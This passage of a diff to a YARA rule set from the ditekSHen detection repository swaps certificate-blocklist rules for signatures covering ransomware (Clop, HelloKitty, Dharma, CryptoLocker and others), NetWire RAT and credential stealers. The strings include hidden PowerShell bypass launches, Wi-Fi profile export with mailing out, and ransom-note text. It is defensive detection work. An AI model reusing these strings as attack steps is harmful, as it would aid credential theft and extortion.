+		$v1_2 = "(iPhone;" ascii
+		$v1_3 = "/tst.php" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "START ARCHITECTURE LTD" and pe.signatures [ i ] . serial == "00:ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $v1* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4F407Eb50803845Cc43937823E1344C0 : FILE
+rule DITEKSHEN_MALWARE_Win_EXEPWSH_Dlagent : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects SystemBC"
 		author = "ditekSHen"
-		id = "d5a6df76-bbbc-5025-b0c4-49e0034c03f3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f5e7490f-806c-52d2-8f1c-9e00ab3e2780"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L759-L770"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4668-L4687"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bb01e912cf40155b0b00e1901bbb3235048ee033d0ddea7a809f0ce8e871e1ce"
-		score = 75
-		quality = 75
+		logic_hash = "6380359db1ac775cea3ebb93f7cf22a92d2f2e634c6aa724e2814c10d4ed42f5"
+		score = 60
+		quality = 55
 		tags = "FILE"
-		thumbprint = "0c1ffe7df27537a3dccbde6f7a49e38c4971e852"
-		importance = 20
+
+	strings:
+		$pwsh = "powershell" fullword ascii
+		$bitstansfer = "Start-BitsTransfer" ascii wide
+		$s1 = "GET %s HTTP/1" ascii
+		$s2 = "User-Agent:" ascii
+		$s3 = "-WindowStyle Hidden -ep bypass -file \"" fullword ascii
+		$s4 = "LdrLoadDll" fullword ascii
+		$v1 = "BEGINDATA" fullword ascii
+		$v2 = /HOST\d:/ ascii
+		$v3 = /PORT\d:/ ascii
+		$v4 = "TOR:" fullword ascii
+		$v5 = "Fwow64" fullword ascii
+		$v6 = "start" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOW COOKED VENTURES LTD" and pe.signatures [ i ] . serial == "4f:40:7e:b5:08:03:84:5c:c4:39:37:82:3e:13:44:c0" )
+		uint16( 0 ) == 0x5a4d and ( ( $pwsh and ( $bitstansfer or 2 of ( $s* ) ) ) or ( 5 of ( $v* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2Bffef48E6A321B418041310Fdb9B0D0 : FILE
+rule DITEKSHEN_MALWARE_Win_Hdlocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects HDLocker ransomware"
 		author = "ditekSHen"
-		id = "fc945c76-b743-52d3-8e15-77afdc629f6d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "03ada32b-6ef5-5600-954b-e9f430c6ff2d"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L785-L796"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4689-L4703"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8d0223b6366f7bc22fd6dd053c1fb6c9e52f80b3bdf9ee46017ddf038bd1e00f"
+		logic_hash = "337678a4a780947841a19c401601f1be7218276c8d4161229567dc4d6026b16a"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "c40c5157e96369ceb7e26e756f2d1372128cee7b"
-		importance = 20
+
+	strings:
+		$s1 = "HDLocker_" fullword ascii
+		$s2 = ".log" fullword ascii
+		$s3 = "Scripting.FileSystemObject" fullword ascii
+		$s4 = "Boot" fullword ascii
+		$s5 = "hellwdo" fullword ascii
+		$s6 = "blackmoon" fullword ascii
+		$s7 = "BlackMoon RunTime Error:" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A&D DOMUS LIMITED" and pe.signatures [ i ] . serial == "2b:ff:ef:48:e6:a3:21:b4:18:04:13:10:fd:b9:b0:d0" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_73B60719Ee57974447C68187E49969A2 : FILE
+rule DITEKSHEN_MALWARE_Win_Vovalex : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Vovalex ransomware"
 		author = "ditekSHen"
-		id = "c72fb0b8-efdc-5734-9754-2289bd95ae3c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "967af585-8a91-5ed0-8400-a8a24d95fd12"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L798-L809"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4705-L4718"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f9cc0f526a3acbfc30c6b76b6705f1a2d9c905b9bb7c996e4db3ca6d4d63be1c"
+		logic_hash = "ea695521981f4b007eee50e95f7989dda1f07cc411c59450489bb17391ff29dc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8e50ddad9fee70441d9eb225b3032de4358718dc"
-		importance = 20
+
+	strings:
+		$s1 = "README.VOVALEX.txt" fullword ascii
+		$s2 = "\\src\\phobos\\std\\" ascii
+		$s3 = "LoadLibraryA(\"Advapi32.dll\")" fullword ascii
+		$s4 = "Failed to spawn process \"" fullword ascii
+		$s5 = "=== Bypassed ===" fullword ascii
+		$s6 = "If you don't know where to buy" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIT HORIZON LIMITED" and pe.signatures [ i ] . serial == "73:b6:07:19:ee:57:97:44:47:c6:81:87:e4:99:69:a2" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2925263B65C7Fe1Cd47B0851Cc6951E3 : FILE
+rule DITEKSHEN_MALWARE_Win_Dharma : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Dharma ransomware"
 		author = "ditekSHen"
-		id = "9e531592-b68c-550b-8609-51f7c9ac63ae"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "070be95e-8d9c-5c4d-9d46-cddea6dbb682"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L811-L822"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4720-L4728"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "163293ce805cdd3ec265fb9c527a5ce19ddab0f6b96355acb636c941ce0bc5f2"
+		logic_hash = "2727b2c0295e32699e08c3c79d7ac6fd52f1520358ac23290d40df428c969f4b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "88ef10f0e160b1b4bb8f0777a012f6b30ac88ac8"
-		importance = 20
+
+	strings:
+		$s1 = "C:\\crysis\\Release\\PDB\\payload.pdb" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "tuning buddy limited" and pe.signatures [ i ] . serial == "29:25:26:3b:65:c7:fe:1c:d4:7b:08:51:cc:69:51:e3" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4Ff4Eda5Fa641E70162713426401F438 : FILE
+rule DITEKSHEN_MALWARE_Win_Cryptolocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Cryptolocker ransomware variants (Betarasite)"
 		author = "ditekSHen"
-		id = "cc81ed1d-bd77-5cec-8bee-23e8ef448edc"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4c6d714d-1fb1-55ce-8022-40f6f634e2cd"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L824-L835"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4730-L4752"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d08e12e74e9c0b7a89ffa81a1b8595953d857e571a5b7a6947eba18bf39610f6"
+		logic_hash = "e1700e8ace338c25119305878e8bc52210506bd42183007985ba9601abdab87b"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "a6277cc8fce0f90a1909e6dac8b02a5115dafb40"
-		importance = 20
+
+	strings:
+		$x1 = "CryptoLocker" fullword wide
+		$x2 = ".betarasite" fullword wide
+		$x3 = "CMSTPBypass" fullword ascii
+		$s1 = "CommandToExecute" fullword ascii
+		$s2 = "SetInfFile" fullword ascii
+		$s3 = "SchoolPrject1" ascii
+		$s4 = "$730d5f64-bd57-47c1-9af4-d20aec714d02" fullword ascii
+		$s5 = "Encrypt" fullword ascii
+		$s6 = "Invalide Key! Please Try Again." fullword wide
+		$s7 = "RegAsm" fullword wide
+		$s8 = "Your key will be destroyed" wide
+		$s9 = "encrypted using RC4 and RSA-2048" wide
+		$c1 = "https://coinbase.com" fullword wide
+		$c2 = "https://localbictoins.com" fullword wide
+		$c3 = "https://bitpanda.com" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DUHANEY LIMITED" and pe.signatures [ i ] . serial == "4f:f4:ed:a5:fa:64:1e:70:16:27:13:42:64:01:f4:38" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or ( 2 of ( $x* ) and 5 of ( $s* ) ) or ( all of ( $c* ) and 1 of ( $x* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_04C7Cdcc1698E25B493Eb4338D5E2F8B : FILE
+rule DITEKSHEN_MALWARE_Win_PWSH_Poshwifistealer
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects PowerShell PoshWiFiStealer"
 		author = "ditekSHen"
-		id = "446608c2-4c9e-56a9-8ac4-2c90397d68e5"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "69ac123d-b746-57f1-a488-547f9a9cdd86"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L837-L848"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4754-L4765"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d1e81d040a279d6024989acbdd40f69de99c97baf789591400370806e846a1c4"
+		logic_hash = "769349360b5d22226a5339a9e8471d06731dc522475c9385c1c145a0488e0ad1"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "60974f5cc654e6f6c0a7332a9733e42f19186fbb"
-		importance = 20
+		tags = ""
+
+	strings:
+		$s1 = "netsh wlan export profile" ascii
+		$s2 = "Send-MailMessage" ascii
+		$u1 = "https://github.com/axel05869/Wifi-Grab" ascii
+		$u2 = "/exploitechx/wifi-password-extractor" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3AN LIMITED" and pe.signatures [ i ] . serial == "04:c7:cd:cc:16:98:e2:5b:49:3e:b4:33:8d:5e:2f:8b" )
+		all of ( $s* ) or all of ( $u* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4C450Eccd61D334E0Afb2B2D9Bb1D812 : FILE
+rule DITEKSHEN_MALWARE_Win_Steamhook : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects potential Steam stealer"
 		author = "ditekSHen"
-		id = "116c86c1-facf-5b69-94f1-3f0f81c38a7d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7533fb83-d721-54e6-8ae1-1c840dd5a13d"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L850-L861"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4767-L4781"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "70851d76af4a4dfe8f1ca4de9925f030d9b937050876828775b78eddd123e3cd"
+		logic_hash = "da743ca99fd19828e3938875acaf6544f17d884587a59623c8361f5905af4a57"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "4c450eccd61d334e0afb2b2d9bb1d812"
-		importance = 20
+
+	strings:
+		$s1 = "Mozilla/4.0 (compatible; )" fullword ascii
+		$s2 = "/steam/upload.php" ascii
+		$s3 = ".*?(ssfn\\d+)" fullword ascii
+		$s4 = "add cookie failed..." fullword ascii
+		$s5 = "Content-Type: multipart/form-data; boundary=--MULTI-PARTS-FORM-DATA-BOUNDARY" fullword ascii
+		$pdb1 = "\\SteamHook\\Install\\" ascii
+		$pdb2 = "\\SteamHook\\dll\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANJELA KEY LIMITED" and pe.signatures [ i ] . serial == "4c:45:0e:cc:d6:1d:33:4e:0a:fb:2b:2d:9b:b1:d8:12" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $pdb* ) or ( 1 of ( $pdb* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0E1Bacb85E77D355Ea69Ba0B : FILE
+rule DITEKSHEN_MALWARE_Win_Netwire : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects NetWire RAT"
 		author = "ditekSHen"
-		id = "18e2dce1-c6aa-55d8-907a-75097feb7acf"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "c215f449-c725-51da-8f5b-2619bc282b22"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L863-L874"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4783-L4805"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f0753c83001e2b9d235afe51ce5d245e085551584ee052a35aaadd95c6c5eeb7"
+		logic_hash = "bae4f0cd7a431336bd784ba95f6ba3396e6f0f12c081e62482ad37ff859c1f1c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6750c9224540d7606d3c82c7641f49147c1b3fd0"
-		importance = 20
+
+	strings:
+		$x1 = "SOFTWARE\\NetWire" fullword ascii
+		$x2 = { 4e 65 74 57 69 72 65 00 53 4f 46 54 57 41 52 45 5c 00 }
+		$s1 = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword ascii
+		$s2 = "filenames.txt" fullword ascii
+		$s3 = "GET %s HTTP/1.1" fullword ascii
+		$s4 = "[%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
+		$s5 = "Host.exe" fullword ascii
+		$s6 = "-m \"%s\"" fullword ascii
+		$g1 = "HostId" fullword ascii
+		$g2 = "History" fullword ascii
+		$g3 = "encrypted_key" fullword ascii
+		$g4 = "Install Date" fullword ascii
+		$g5 = "hostname" fullword ascii
+		$g6 = "encryptedUsername" fullword ascii
+		$g7 = "encryptedPassword" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BULDOK LIMITED" and pe.signatures [ i ] . serial == "0e:1b:ac:b8:5e:77:d3:55:ea:69:ba:0b" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $x* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( all of ( $g* ) and ( 2 of ( $s* ) or 1 of ( $x* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5998B4Affe2Adf592E6528Ff800E567C : FILE
+rule DITEKSHEN_MALWARE_Win_Breakstaf : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects BreakStaf ransomware"
 		author = "ditekSHen"
-		id = "b81787fd-a8f1-5640-bf8a-8129f708a337"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3c8ca485-2cb4-56fd-a1f5-16b43515cec9"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L876-L887"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4807-L4827"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d9f589ce6367517f3c93b7b0675b19249108849e52bd9264e31bf8109e5a121f"
+		logic_hash = "56078b797c64ce77398f9b92e5677f7159d8357eafb03cf62bb30f06d4f3b2e3"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "d990d584c856bd28eab641c3c3a0f80c0b71c4d7"
-		importance = 20
+
+	strings:
+		$s1 = "C:\\Program files" wide
+		$s2 = "C:\\Program files (x86)" wide
+		$s3 = "C:\\System Volume Information" wide
+		$s4 = "C:\\$Recycle.Bin" wide
+		$s5 = "C:\\Windows" wide
+		$s6 = ".?AVRandomNumberGenerator@Crypto" ascii
+		$s7 = ".?AV?$SymmetricCipherFinal@" ascii
+		$s8 = ".breakstaf" fullword wide nocase
+		$s9 = "readme.txt" fullword wide nocase
+		$s10 = ".VHD" fullword wide nocase
+		$s11 = ".vhdx" fullword wide nocase
+		$s12 = ".BAK" fullword wide nocase
+		$s13 = ".BAC" fullword wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAT GOES ON LIMITED" and pe.signatures [ i ] . serial == "59:98:b4:af:fe:2a:df:59:2e:65:28:ff:80:0e:56:7c" )
+		uint16( 0 ) == 0x5a4d and 12 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B7E0Cf12E4Ae50Dd643A24285485602F : FILE
+rule DITEKSHEN_MALWARE_Win_Kitty : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects HelloKitty ransomware, triggers on FIVEHANDS"
 		author = "ditekSHen"
-		id = "d314925c-c6b2-5a7f-ba73-038ea4759149"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4147294a-7eff-595a-ad4f-8a84ffff960f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L889-L900"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4829-L4847"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7aefb436b7e3865b1abb6bbc3e0027a628f39e25cb4b28f35f070e000c19c1c7"
+		logic_hash = "3a36755c81ec70c127bb73448fc29325444b85b5f0704327fc81975c2af2e99e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "744160f36ba9b0b9277c6a71bf383f1898fd6d89"
-		importance = 20
+
+	strings:
+		$s1 = "Kitty" wide
+		$s2 = "-path" fullword wide
+		$s3 = "select * from Win32_ShadowCopy" fullword wide
+		$s4 = "Win32_ShadowCopy.ID='%s'" fullword wide
+		$s5 = "programdata" fullword wide
+		$s6 = "$recycle.bin" fullword wide
+		$s7 = ".crypt" fullword wide
+		$s8 = "%s/secret/%S" wide
+		$s9 = "decrypts3nln3tic.onion" wide
+		$n1 = "read_me_lkd.txt" wide
+		$n2 = "DECRYPT_NOTE.txt" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GESO LTD" and pe.signatures [ i ] . serial == "00:b7:e0:cf:12:e4:ae:50:dd:64:3a:24:28:54:85:60:2f" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 1 of ( $n* ) and 4 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_767436921B2698Bd18400A24B01341B6 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent07 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects delf downloader agent"
 		author = "ditekSHen"
-		id = "ffd19457-1a5d-5782-89e2-3dd4090f124f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a45afe84-15ae-528a-ad7e-ab9f03045789"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L902-L913"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4849-L4867"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b09ec625a06dcf90df52c56b78889f24d55dbd8cbd7d82a07bdbc842318ff19a"
+		logic_hash = "1e0001d18524d0d34ad876e67e2c4dc0495ee18a73c34f53f97367876e27b406"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "871899843b5fd100466e351ca773dac44e936939"
-		importance = 20
+
+	strings:
+		$s1 = "C:\\Users\\Public\\Libraries\\temp" fullword ascii
+		$s2 = "SOFTWARE\\Borland\\Delphi" ascii
+		$s3 = "Mozilla/5.0(compatible; WinInet)" fullword ascii
+		$o1 = { f3 a5 e9 6b ff ff ff 5a 5d 5f 5e 5b c3 a3 00 40 }
+		$o2 = { e8 83 d5 ff ff 8b 15 34 40 41 00 89 10 89 58 04 }
+		$o3 = { c3 8b c0 53 51 e8 f1 ff ff ff 8b d8 85 db 74 3e }
+		$o4 = { e8 5c e2 ff ff 8b c3 e8 b9 ff ff ff 89 04 24 83 }
+		$o5 = { 85 c0 74 1f e8 62 ff ff ff a3 98 40 41 00 e8 98 }
+		$o6 = { 85 c0 74 19 e8 be ff ff ff 83 3d 98 40 41 00 ff }
+		$x1 = "22:40:08        \"> <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\"> <rdf:Description rdf:about=\"\"" ascii
+		$x2 = "uuid:A9BD8E384B2FDE118D26E6EE744C235C\" stRef:documentID=\"uuid:A8BD8E384B2FDE118D26E6EE744C235C\"/>" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REBROSE LEISURE LIMITED" and pe.signatures [ i ] . serial == "76:74:36:92:1b:26:98:bd:18:40:0a:24:b0:13:41:b6" )
+		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $s* ) and 5 of ( $o* ) ) or ( all of ( $s* ) and 2 of ( $o* ) ) or ( all of ( $x* ) and 2 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_26B125E669E77A5E58Db378E9816Fbc3 : FILE
+rule DITEKSHEN_MALWARE_Win_Clop : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Clop ransomware variants"
 		author = "ditekSHen"
-		id = "18985965-9e26-526c-9354-20667d472615"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "d3c9e950-8b03-5d19-8448-9cf208813df2"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L915-L926"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4869-L4889"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "859793bfeba55c9912a1e18db86cd391d4c4981f4be11f3a53d887d429882671"
+		logic_hash = "a1a21100c468c4db147f97b0724b7a3aefbb92b157071bfe6f61d02768573b44"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "900aa9e6ff07c6528ecd71400e6404682e812017"
-		importance = 20
+
+	strings:
+		$x1 = "Cllp^_-" ascii
+		$s2 = "temp.dat" fullword wide
+		$s3 = "README_README.txt" wide
+		$s4 = "BEGIN PUBLIC KEY" ascii
+		$s5 = "runrun" wide
+		$s6 = "wevtutil.exe" ascii
+		$s7 = "%s%s.Cllp" fullword wide
+		$s8 = "WinCheckDRVs" fullword wide
+		$o1 = { 6a ff 56 89 9d 28 dd ff ff ff d0 a1 64 32 41 00 }
+		$o2 = { 56 89 9d 28 dd ff ff ff 15 78 32 41 00 eb 07 43 }
+		$o3 = { 68 ?? 34 41 00 8d 85 58 dd ff ff 50 ff d7 85 c0 }
+		$o4 = { 68 d0 34 41 00 50 ff d6 8b bd 28 d5 ff ff 83 c4 }
+		$o5 = { a1 64 32 41 00 43 56 89 9d 08 d5 ff ff ff d0 8b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLOWER DELI LTD" and pe.signatures [ i ] . serial == "26:b1:25:e6:69:e7:7a:5e:58:db:37:8e:98:16:fb:c3" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $x* ) and ( 3 of ( $s* ) or 4 of ( $o* ) ) ) or ( all of ( $o* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) and 4 of ( $o* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_29A248A77D5D4066Fe5Da75F32102Bb5 : FILE
+rule DITEKSHEN_MALWARE_Win_Maktub : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Maktub ransomware"
 		author = "ditekSHen"
-		id = "b71f4ee4-55d1-51c7-8fc3-1c6fcaa64a86"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "be47d858-8497-593f-865b-c3d3a5db6c2e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L928-L939"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4891-L4905"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "063a8b361e9fc91619912109427f6a0cbc7755e85dae820ea0f16709ac580ed1"
+		logic_hash = "5c11d04fc3088eb8a0132b9ed83748ddb7e1bbe9d03b9e884d4003181cbb6d69"
 		score = 75
 		quality = 75
 		tags = "FILE"
